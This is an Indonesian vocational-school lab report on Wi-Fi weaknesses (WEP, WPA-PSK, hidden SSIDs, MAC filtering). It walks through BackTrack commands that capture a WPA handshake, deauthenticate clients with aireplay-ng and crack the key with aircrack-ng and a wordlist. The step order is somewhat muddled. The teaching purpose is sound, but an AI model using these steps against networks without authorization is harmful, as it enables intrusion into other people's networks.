SITI
TOYYIBAH
|
HACKING
WIRELESS
|
Senin,
21 Januari 2013
|
XI TKJ B
|
Bu
Chandra & Pa Antoni
|
|
SMKN 1
CIMAHI
|
TUJUAN
Agar sitswa dapat menyesuaikan dan
memahami materi pembelajaran mengenai
wireless , hacking wireless.
PENDAHULUAN
Wireless merupakan
jaringan tanpa kabel yang menggunakan udara sebagai media transmisinya untuk
menghantarkan gelombang elektromagnetik.
Secara umum, tekonologi wireless dapat dibagi menjadi dua:
a. Berbasis seluler (cellular-based),
yaitu solusi yang menggunakan saluran komunikasi cellular atau pager yang sudah
ada untuk mengirimkan data. Jangkauan dari cellullar-based biasanya cukup jauh.
Contoh teknologinya GSM, CDMA, TDMA, CDPD, GPRS /EDGE, 2G, 2.5G, 3G, UMTS
b. Wireless LAN (WLAN): yaitu komunikasi
wireless dalam lingkup area yang terbatas, biasanya antara 10 sampai dengan 100
meter dari base station k Access Point (AP). keluarga IEEE 802.11 (seperti
802.11b, 802.11a, 802.11g), HomeRF, 802.15 (Personal Area Network) yang
berbasis Bluetooth, 802.16 (Wireless Metropolitan Area Network).
Pemakaian teknologi
wireless secara umum dibagi atas tanpa pengamanan (nonsecure) dan dengan
pengamanan (Share Key/secure). Non Secure (open), yaitu tanpa menggunakan
pengaman, dimana computer yang memiliki pancaran gelombang dapat mendengar
transmisi sebuah pancaran gelombang dan langsung masuk kedalam network.
Sedangkan share key, yaitu alternatif untuk pemakaian kunci atau password.
Sebagai contoh, sebuah network yang mengunakan WEP.
KELEMAHAN WIRELESS
Kelemahan jaringan
wireless secara umum dapat dibagi menjadi 2 jenis, yakni kelemahan pada
konfigurasi dan kelemahan pada jenis enkripsi yang digunakan. Kelemahan
tersebut seperti : wireless yang dipasang pada jaringan masih menggunakan
setting default bawaan vendor seperti SSID, IP Address , remote manajemen, DHCP
enable, kanal frekuensi, tanpa enkripsi bahkan user/password untuk administrasi
wireless tersebut:
· Menyembunyikan
SSID (Service Set Identifier)
- Hanya yang
mengetahui SSID yang dapat terhubung ke jaringan
- Beberapa
tools yang dapat digunakan untuk mendapatkan ssid yang dihidden antara lain,
kismet (kisMAC), ssid_jack (airjack), aircrack , void11.
·
Keamanan
wireless hanya dengan kunci WEP
- Masalah kunci
yang lemah, algoritma RC4 yang digunakan dapat dipecahkan.
- WEP
menggunakan kunci yang bersifat statis
- Masalah
initialization vector (IV) WEP
- Masalah
integritas pesan Cyclic Redundancy Check (CRC-32)
·
WEP
terdiri dari dua tingkatan, yakni kunci 64 bit, dan 128 bit. Sebenarnya kunci
rahasia pada kunci WEP 64 bit hanya 40 bit, sedang 24bit merupakan Inisialisasi
Vektor (IV). Demikian juga pada kunci WEP 128 bit, kunci rahasia terdiri dari
104bit. Serangan-serangan pada kelemahan
WEP antara lain :
1. Serangan terhadap kelemahan inisialisasi vektor (IV),
sering disebut FMS attack
2. Mendapatkan IV yang unik melalui packet data yang
diperoleh untuk diolah untuk proses cracking kunci WEP dengan lebih cepat. Cara
ini disebut chopping attack.
3. Kedua serangan diatas membutuhkan waktu dan packet yang
cukup, untuk mempersingkat waktu, para hacker biasanya melakukan traffic
injection.
·
Keamanan
wireless hanya dengan kunci WPA-PSK atau WPA2-PSK
- Ada dua jenis
yakni WPA personal (WPA-PSK), dan WPARADIUS/ Enterprise.
- Saat ini yang
sudah dapat di crack adalah WPA-PSK, yakni dengan metode brute force attack
secara offline.
·
MAC
Filtering
- Pada jaringan
wireless, duplikasi MAC adress tidak mengakibatkan konflik. Hanya membutuhkan
IP yang berbeda dengan client yang tadi.
- Bisa diserang
dengan arp spoofing
ALAT & BAHAN
-
Backtrack
-
Laptop
ISI
/ LANGKAH KERJA
1. Install Backtrack terlebih dahulu.
2. Jalankan terminal dan masukan
perintah seperti berikut:
#airmon-ng
#airmon-ng stop wlan0
3.
Kemudian masukan perintah seperti berikut ini:
#airmon-ng
#airmon-ng start wlan0
4.
Lalu selanjutnya masukan perintah seperti ini:
#airodump-ng
wlan0
5.
Kemudian masukan perintah ini:
# airodump-ng --channel (channel) --bssid (mac ap) -w
(nama file) wlan0
Dan akan masuk pada tampilan seperti ini
6.
Lalu masuk dengan perintah seperti ini
#cd /pentest
#cd wireless
#cd aircrack-ng/
#cd test
 |
|||
#aircrack-ng -w
password.lst /root/(nama file)*.cap
Maka
akan muncul tampilan seperti berikut ini:
8.
Kemudian masukan perintah
#pwd
#ls
Untuk
melihat posisi kita dimana
Kemudian masukan perintah ini
#aireplay-ng --deauth 5 -c (mac client) -a (mac ap) wlan0
Apabila tampilannya seperti itu berarti kita sudah bisa membobol
WPA pada wireless dengan SSID whitewspot
hotspot.
KESIMPULAN
è Meskipun
wireless telah memiliki beberapa lapis keamanan. Kita masih dapat melakukan
hacking seperti ini. Hal ini menandakan bahwa masih terdapatnya kelemahan dari
system keamanan wireless.
